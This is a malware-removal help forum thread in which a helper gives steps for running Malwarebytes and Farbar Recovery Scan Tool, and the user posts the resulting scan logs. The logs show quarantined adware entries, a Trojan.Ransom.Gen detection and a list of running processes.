If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
Upon completion of the scan (or after the reboot), click the History tab.
Click Application Logs and double-click the Scan Log.
At the bottom click Export and choose Text file.

Save the file to your desktop and include its content in your next reply.

Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

Right-click on icon and select Run as Administrator to start the tool.
> XP users click run after receipt of Windows Security Warning - Open File.
> 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
Make sure that Addition option is checked.
Press Scan button and wait.
The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.

jjoyner1985 · August 25, 2014

I was able to run MBAM and FRST without having to go into safe mode. So, that's progress at least. Still getting a lot of automatic web page generation, though. Here are the requested logs:

MBAM

Malwarebytes Anti-Malware

www.malwarebytes.org

Scan Date: 8/25/2014

Scan Time: 8:28:24 AM

Logfile: MBAM.txt

Administrator: Yes

Version: 2.00.2.1012

Malware Database: v2014.08.25.02

Rootkit Database: v2014.08.21.01

License: Free

Malware Protection: Disabled

Malicious Website Protection: Disabled

Self-protection: Disabled

OS: Windows Vista Service Pack 2

CPU: x86

File System: NTFS

User: savas.kyriakidis

Scan Type: Threat Scan

Result: Completed

Objects Scanned: 355293

Time Elapsed: 27 min, 27 sec

Memory: Enabled

Startup: Enabled

Filesystem: Enabled

Archives: Enabled

Rootkits: Enabled

Heuristics: Enabled

PUP: Enabled

PUM: Enabled

Processes: 0

(No malicious items detected)

Modules: 0

(No malicious items detected)

Registry Keys: 4

PUP.Optional.FrostwireTB.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D4027C7F-154A-4066-A1AD-4243D8127440}, Quarantined, [d8c171584239cf67d207b7f7ca38da26],

PUP.Optional.FrostwireTB.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D4027C7F-154A-4066-A1AD-4243D8127440}, Quarantined, [d8c171584239cf67d207b7f7ca38da26],

PUP.Optional.MindSpark.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, Quarantined, [74251faa205b3bfbe62350acc2409a66],

PUP.Optional.MindSpark.A, HKU\S-1-5-21-3726736968-409882640-1958551794-501-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, Quarantined, [990042871b6054e235d494683ac823dd],

Registry Values: 1

Trojan.Ransom.Gen, HKU\S-1-5-21-3726736968-409882640-1958551794-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|IrfuqApivh, regsvr32.exe "C:\ProgramData\IrfuqApivh\IrfuqApivh.dat", Quarantined, [d9c0d5f48bf0bc7a416eaaa220e47b85]

Registry Data: 0

(No malicious items detected)

Folders: 0

(No malicious items detected)

Files: 1

Trojan.Ransom.Gen, C:\ProgramData\IrfuqApivh\IrfuqApivh.dat, Quarantined, [d9c0d5f48bf0bc7a416eaaa220e47b85],

Physical Sectors: 0

(No malicious items detected)

(end)

FRST

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014

Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 25-08-2014 09:47:13

Running from G:\

Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: English (United States)

Internet Explorer Version 9

Boot Mode: Normal

The only official download link for FRST:

Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/

Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/

Download link from any site other than Bleeping Computer is unpermitted or outdated.

See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe

(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe

(Microsoft Corporation) C:\Windows\System32\wlanext.exe

(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe

(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE

( ) C:\Windows\System32\lxblcoms.exe

() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe

(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe

() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe

(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE

(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe

(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe

(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe

(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe

(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe

(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe

(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe

(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe

(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe

(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe

(Microsoft Corporation) C:\Windows\ehome\ehtray.exe

(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe

(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe

() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe

(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE

(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe

(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe

(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe

(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe

(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe

(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe

(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe